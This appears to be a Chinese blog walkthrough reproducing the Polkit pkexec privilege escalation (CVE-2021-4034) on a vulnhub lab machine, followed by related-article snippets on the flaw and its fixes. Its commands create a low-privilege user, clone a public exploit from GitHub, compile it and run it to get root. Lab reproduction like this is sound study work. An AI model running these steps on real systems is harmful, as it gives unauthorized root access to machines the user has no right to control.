Polkit(CVE-2021-4034复现)提权

最新推荐文章于 2023-12-15 11:10:30 发布
最新推荐文章于 2023-12-15 11:10:30 发布
阅读量192 收藏
点赞数
分类专栏: windows+linux提权 文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129308330
版权

漏洞影响2009年5月至今的所有polkit版本

此工具是linux系统预装工具,所有存在此工具的linux系统都会收到影响

判断是否有这个漏洞:

dpkg -l policykit-1       #debain,ubuntu
rpm -qai  policykit-1     #centos,redhat

本次环境是vulnhub的lampiao(脏牛)靶机

复现:

新建用户:

useradd -d /home/test -m  test     #新建用户
passwd test                        #改密码
su test                            #切换用户
cd /tmp                            #进入tmp目录

下载exp(exp下载到了tmp目录下):

git clone https://github.com/berdav/CVE-2021-4034.git  #不能下载时,就自己复制链接下载,在传到目标靶机
cd CVE-2021-4034/                                     
make                  #编译                         
./cve-2021-4034       #运行

成功提权:

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2021-4034 polkit本地权限提升[pkexec权限问题]
01-27
polkit 的 pkexec 中发现的一个权限提升漏洞(CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux 发行版的默认配置中。 CentOS 7 polkit-0.112-26.el7_9.1.x86_64 不受影响。
CVE-2021-4034_Polkit提权漏洞复现与修复
Jietewang的博客
06-09 5559
CVE-2021-4034:利用polkit的pkexec进行Linux普通权限提升测试以及CentOS和Ubuntu修复建议
Linux Polkit本地权限提升漏洞处理(CVE-2021- 4034
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-07 9864
一、背景   安全部门近期发出安全预警,提示:常见发现版本的 CentOS、Ubuntu及Debian Linux系统中默认安装的Polkit工具集存在本地权限提升的漏洞CVE-2021- 4034),目前漏洞利用代码已在互联网公开;    Linux Polkit工具集是Linux系统在安装过程中自带的系统工具集,其中包括大量运维常用工具。该工具集中的pkexec在特定情况下无法正确处理调用参数计数,因此会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,使自身从系统普通用户权限提升至管理员权限,对
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 905
2022年1月25日。
CVE-2021-4034漏洞攻击案例(提权
weixin_50281314的博客
07-22 422
CVE-2021-4034漏洞攻击案例(提权
通杀漏洞CVE-2021-4034提权原理和应用
qq_39641273的博客
06-14 295
CVE的英文全称是Common Vulnerabilities & Exposures(公共漏洞和暴露)。
Linux pkexec高危漏洞 CVE-2021-4034修复
02-10
polkit rpm包 执行rpm -Uvh polkit-0.112-26.el7_9.1.x86_64.rpm 即可修复
【PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在默认配置中利用该漏洞来获得...3.执行./cve-2021-4034
Linux Polkit 权限提升漏洞(CVE-2021-4034)在 CentOS 6 系统上修复升级的 rpm 离线包
02-07
Linux Polkit 权限提升漏洞(CVE-2021-4034)在 CentOS 6 系统上修复升级的 rpm 离线包 修复方法: rpm -Uvh *.rpm
Linux-Poolkit提权
qq_43381463的博客
02-25 589
漏洞复现- Linux Polkit 权限提升漏洞(CVE-2021-4034
泱脏武器库之 CVE 2021-4034 Polkit 提权小结
weixin_41557838的博客
03-17 2417
背景: 2021年11月29日,Qualys Security Advisory 组织发现并提交了针对于Linux Polkit 组件的提权漏洞CVE 2021-4034,覆盖广泛的Linux发行版本,如 :RedHat Entreprise Linux、Fedora、 Ubuntu、 ArchLinux、国内发行版本如:Kylin Linux、UOS Linux、Euler OS、Anolis OS、Circle Linux,影响范围涉及从2009年5月至2022年1月横跨10余年的全部发行版本。 ..
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)修复
灵壹Eli的博客
08-01 283
服务器polkit pkexec 本地提权漏洞(CVE-2021-4034)遇到漏洞。
Linux Polkit权限提升漏洞风险(CVE-2021-4034
最新发布
DN三叶草的博客
12-15 104
如果系统没有可用的补丁,可以从 pkexec 中删除 SUID 位作为临时缓解措施。
Linux polkit提权漏洞复现
sweelg的博客
02-28 566
目录 PwnKit漏洞描述 PwnKit 漏洞原理 PwnKit漏洞复现 PwnKit漏洞修复 PwnKit漏洞描述 Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。 PwnKit 漏洞原理 以下是对 PwnKit 漏洞如何工作的解释。 pkexec 的 main() 函数的开
CVE-2021-3560-POLKIT本地提权漏洞复现
「鸿渐之翼」的博客
07-22 2033
博主:鴻漸之翼 个人介绍:男,搞底層的FW,喜歡發一點沒用的東西。 Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit! Tested on Ubuntu20.10 Linux localhost 啟明星辰漏洞簡介 Polkit是许多Linux 发行版上默认安装的系统服务,它被systemd使用,所以任何使用systemd的Linux发行版都会使用polkit2021年06月03日,RedHat发布安全公告,修复了Linux Po
Polkit权限提升漏洞(CVE-2021-4034)利用及修复
热门推荐
zhongxj183的博客
02-16 1万+
Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 文章目录Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复漏洞说明危害等级影响版本修复版本漏洞利用漏洞修复升级polkit版本临时修复方案-调整pkexec权限意见反馈 漏洞说明 2022年1月25日 qualys安全研究人员披露 CVE-2021-4034 polkit pkexec 本地提权漏洞漏洞细节,polkit pkexec 中对命令行参数处理有误,导致参数注入,能够导致本地提权。 pkexec应用程序为Lin
CVE-2021-3560 Linux Polkit 权限提升漏洞
做自己喜欢的事,并将其发挥到极致!
11-10 1386
Polkit是默认安装在很多Linux发行版上的系统服务,它由systemd使用,因此任何使用systemd的Linux发行版也使用PolkitCVE-2021-3560漏洞存在于系统服务Polkit中,同时因为Polkit被Systemd所调用,因此所有默认安装了systemd的Linux发行版都会使用Polkit。该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误。而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。
CVE-2021-4034漏洞原理解析
Ays.Ie的博客
11-18 8039
本篇文章主要分析了CVE-2021-4034漏洞,同时介绍了相关知识点以及使用方法,漏洞复现在前渗透测试(七)中体现,记录自己学习过程。
Linux Polkit的一个本地提权漏洞(cve-2021-4034)
weixin_44654338的博客
03-15 4786
描述: 在 polkit 的 pkexec 工具程序中发现了一个本地权限升级漏洞。pkexec 工具程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。当前的 pkexec 版本会错误处理调用参数,导致尝试以命令形式执行环境变量。攻击者可以利用这个安全漏掉,通过精心设计一组环境变量导致 pkexec 执行任意代码。当成功执行后,就会在目标系统中导致本地特权升级,并可以使用户获得管理权限。 ...
cve-2021-43734
08-12
- *1* [CVE-2021-4034修复方法](https://blog.csdn.net/juxua_xatu/article/details/122721682)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值